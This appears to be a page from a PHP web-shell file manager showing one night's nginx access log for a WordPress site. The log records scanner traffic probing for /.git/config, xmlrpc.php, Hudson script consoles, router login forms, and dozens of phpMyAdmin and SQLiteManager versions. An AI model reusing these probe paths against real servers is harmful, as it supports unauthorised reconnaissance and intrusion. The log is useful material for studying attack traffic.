HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: /home/logs/cqqizhou_access_2025-09-22.log
36.133.115.36 - - [22/Sep/2025:00:10:29 +0800] "POST /wp-cron.php?doing_wp_cron=1758471029.0827960968017578125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [22/Sep/2025:00:10:30 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
42.236.101.228 - - [22/Sep/2025:00:20:07 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [22/Sep/2025:00:30:48 +0800] "POST /wp-cron.php?doing_wp_cron=1758472248.9014210700988769531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [22/Sep/2025:00:30:49 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:00:52:35 +0800] "POST /wp-cron.php?doing_wp_cron=1758473555.1062660217285156250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
38.110.46.239 - - [22/Sep/2025:00:52:35 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3"
36.133.115.36 - - [22/Sep/2025:00:55:03 +0800] "POST /wp-cron.php?doing_wp_cron=1758473703.5088739395141601562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.79.200.193 - - [22/Sep/2025:00:55:03 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
36.133.115.36 - - [22/Sep/2025:01:00:17 +0800] "POST /wp-cron.php?doing_wp_cron=1758474017.6500339508056640625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
38.110.46.239 - - [22/Sep/2025:01:00:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3"
36.133.115.36 - - [22/Sep/2025:01:02:09 +0800] "POST /wp-cron.php?doing_wp_cron=1758474129.7811570167541503906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
175.176.166.145 - - [22/Sep/2025:01:02:10 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36.133.115.36 - - [22/Sep/2025:01:06:24 +0800] "POST /wp-cron.php?doing_wp_cron=1758474384.0359089374542236328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.239.145 - - [22/Sep/2025:01:06:24 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Sep/2025:01:10:23 +0800] "POST /wp-cron.php?doing_wp_cron=1758474623.6604349613189697265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.64.105.250 - - [22/Sep/2025:01:10:23 +0800] "GET /ReportServer HTTP/1.1" 404 8990 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [22/Sep/2025:01:14:22 +0800] "POST /wp-cron.php?doing_wp_cron=1758474862.8725600242614746093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [22/Sep/2025:01:14:22 +0800] "HEAD /ReportServer HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
36.133.115.36 - - [22/Sep/2025:01:16:59 +0800] "POST /wp-cron.php?doing_wp_cron=1758475019.6522150039672851562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [22/Sep/2025:01:16:59 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:01:22:08 +0800] "POST /wp-cron.php?doing_wp_cron=1758475328.5533859729766845703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [22/Sep/2025:01:22:08 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
49.51.253.26 - - [22/Sep/2025:01:22:09 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F HTTP/1.1" 200 1096 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Sep/2025:01:30:25 +0800] "POST /wp-cron.php?doing_wp_cron=1758475825.1407051086425781250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.101.151 - - [22/Sep/2025:01:30:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.101.151 - - [22/Sep/2025:01:30:27 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.11.141 - - [22/Sep/2025:01:30:36 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Sep/2025:01:32:17 +0800] "POST /wp-cron.php?doing_wp_cron=1758475937.7345929145812988281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.174.93.12 - - [22/Sep/2025:01:32:17 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (Linux; Android 8.1.0; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
36.133.115.36 - - [22/Sep/2025:01:40:29 +0800] "POST /wp-cron.php?doing_wp_cron=1758476429.7679989337921142578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [22/Sep/2025:01:40:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [22/Sep/2025:01:44:54 +0800] "POST /wp-cron.php?doing_wp_cron=1758476694.8954489231109619140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
117.62.235.53 - - [22/Sep/2025:01:44:54 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
117.62.235.53 - - [22/Sep/2025:01:45:03 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Sep/2025:02:03:13 +0800] "POST /wp-cron.php?doing_wp_cron=1758477793.6722309589385986328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
95.154.198.138 - - [22/Sep/2025:02:03:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [22/Sep/2025:02:04:59 +0800] "POST /wp-cron.php?doing_wp_cron=1758477898.9880208969116210937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [22/Sep/2025:02:04:59 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:02:19:00 +0800] "POST /wp-cron.php?doing_wp_cron=1758478740.5944900512695312500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [22/Sep/2025:02:19:00 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:02:23:37 +0800] "POST /wp-cron.php?doing_wp_cron=1758479016.9789779186248779296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
193.24.123.88 - - [22/Sep/2025:02:23:37 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "python-requests/2.27.1"
36.133.115.36 - - [22/Sep/2025:02:42:19 +0800] "POST /wp-cron.php?doing_wp_cron=1758480139.5814280509948730468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
104.131.50.21 - - [22/Sep/2025:02:42:19 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.115.36 - - [22/Sep/2025:02:53:51 +0800] "POST /wp-cron.php?doing_wp_cron=1758480831.4245469570159912109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [22/Sep/2025:02:53:51 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:03:07:38 +0800] "POST /wp-cron.php?doing_wp_cron=1758481658.3989090919494628906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
163.227.230.253 - - [22/Sep/2025:03:07:38 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 8990 "http://36.133.115.36:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
36.133.115.36 - - [22/Sep/2025:03:08:49 +0800] "POST /wp-cron.php?doing_wp_cron=1758481729.5595889091491699218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
79.242.226.133 - - [22/Sep/2025:03:08:50 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
20.171.207.110 - - [22/Sep/2025:03:09:24 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.133.115.36 - - [22/Sep/2025:03:14:04 +0800] "POST /wp-cron.php?doing_wp_cron=1758482044.3477339744567871093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
104.131.50.21 - - [22/Sep/2025:03:14:04 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.115.36 - - [22/Sep/2025:03:15:07 +0800] "POST /wp-cron.php?doing_wp_cron=1758482107.0324809551239013671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [22/Sep/2025:03:15:07 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:03:19:04 +0800] "POST /wp-cron.php?doing_wp_cron=1758482344.2613289356231689453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [22/Sep/2025:03:19:04 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:03:21:26 +0800] "POST /wp-cron.php?doing_wp_cron=1758482486.9016699790954589843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.63.89.208 - - [22/Sep/2025:03:21:26 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36 OPR/106.0.0.0"
34.63.89.208 - - [22/Sep/2025:03:21:27 +0800] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Linux; U; Android 11; en-US; V2027) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116 UCBrowser/13.4.0.1306 Mobile Safari/537.36"
34.63.89.208 - - [22/Sep/2025:03:21:28 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0"
34.63.89.208 - - [22/Sep/2025:03:21:29 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.20 Safari/537.36"
34.63.89.208 - - [22/Sep/2025:03:21:30 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S918B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/24.0 Chrome/120.0.6099.144 Mobile Safari/537.36"
34.63.89.208 - - [22/Sep/2025:03:21:31 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new" "Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S918B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/24.0 Chrome/120.0.6099.144 Mobile Safari/537.36"
34.63.89.208 - - [22/Sep/2025:03:21:31 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0"
34.63.89.208 - - [22/Sep/2025:03:21:32 +0800] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
34.63.89.208 - - [22/Sep/2025:03:21:33 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36 OPR/106.0.0.0"
34.63.89.208 - - [22/Sep/2025:03:21:34 +0800] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.20 Safari/537.36"
34.63.89.208 - - [22/Sep/2025:03:21:34 +0800] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.140 Safari/537.36 Vivaldi/6.4.3160.47"
34.63.89.208 - - [22/Sep/2025:03:21:35 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.140 Safari/537.36 Vivaldi/6.4.3160.47"
36.133.115.36 - - [22/Sep/2025:03:38:35 +0800] "POST /wp-cron.php?doing_wp_cron=1758483515.1488320827484130859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.45.237.35 - - [22/Sep/2025:03:38:35 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:36 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:38 +0800] "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1" 200 25126 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:41 +0800] "GET /HNAP1/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:45 +0800] "GET /hudson/script HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
36.133.115.36 - - [22/Sep/2025:03:38:47 +0800] "POST /wp-cron.php?doing_wp_cron=1758483527.1650319099426269531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.45.237.35 - - [22/Sep/2025:03:38:47 +0800] "GET /script HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:48 +0800] "GET /sqlite/main.php HTTP/1.1" 404 47 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:49 +0800] "GET /sqlitemanager/main.php HTTP/1.1" 404 47 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:53 +0800] "GET /SQLiteManager/main.php HTTP/1.1" 404 47 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:55 +0800] "GET /SQLite/main.php HTTP/1.1" 404 47 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:57 +0800] "GET /SQlite/main.php HTTP/1.1" 404 47 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:38:58 +0800] "GET /main.php HTTP/1.1" 404 47 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:00 +0800] "GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1" 404 47 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:04 +0800] "GET /SQLiteManager-1.2.4/main.php HTTP/1.1" 404 47 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:05 +0800] "GET /agSearch/SQlite/main.php HTTP/1.1" 404 47 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:07 +0800] "GET /phpmyadmin/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:10 +0800] "GET /phpMyAdmin/ HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:26 +0800] "GET /PMA/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:28 +0800] "GET /pma/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:32 +0800] "GET /admin/ HTTP/1.1" 302 5 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:34 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:35 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 2779 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:39:40 +0800] "GET /dbadmin/ HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
36.133.115.36 - - [22/Sep/2025:03:39:48 +0800] "POST /wp-cron.php?doing_wp_cron=1758483588.3224000930786132812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.45.237.35 - - [22/Sep/2025:03:39:48 +0800] "GET /mysql/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:40:06 +0800] "GET /myadmin/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:40:08 +0800] "GET /openserver/phpmyadmin/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:40:12 +0800] "GET /phpmyadmin2/ HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:40:17 +0800] "GET /phpMyAdmin2/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:40:19 +0800] "GET /phpMyAdmin-2/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:40:22 +0800] "GET /php-my-admin/ HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:40:25 +0800] "GET /phpMyAdmin-2.2.3/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:40:35 +0800] "GET /phpMyAdmin-2.2.3/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
36.133.115.36 - - [22/Sep/2025:03:41:06 +0800] "POST /wp-cron.php?doing_wp_cron=1758483666.2960920333862304687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.45.237.35 - - [22/Sep/2025:03:41:06 +0800] "GET /phpMyAdmin-2.2.3/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:41:14 +0800] "GET /phpMyAdmin-2.2.6/ HTTP/1.1" 404 8991 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:41:17 +0800] "GET /phpMyAdmin-2.5.1/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:41:20 +0800] "GET /phpMyAdmin-2.5.4/ HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:41:25 +0800] "GET /phpMyAdmin-2.5.5-rc1/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:41:32 +0800] "GET /phpMyAdmin-2.5.5-rc2/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:41:39 +0800] "GET /phpMyAdmin-2.5.5/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
36.133.115.36 - - [22/Sep/2025:03:41:48 +0800] "POST /wp-cron.php?doing_wp_cron=1758483708.1333439350128173828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.45.237.35 - - [22/Sep/2025:03:41:48 +0800] "GET /phpMyAdmin-2.5.5-pl1/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:41:53 +0800] "GET /phpMyAdmin-2.5.6-rc1/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:42:10 +0800] "GET /phpMyAdmin-2.5.6-rc2/ HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:42:13 +0800] "GET /phpMyAdmin-2.5.6/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:42:14 +0800] "GET /phpMyAdmin-2.5.7/ HTTP/1.1" 404 8991 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:42:16 +0800] "GET /phpMyAdmin-2.5.7-pl1/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
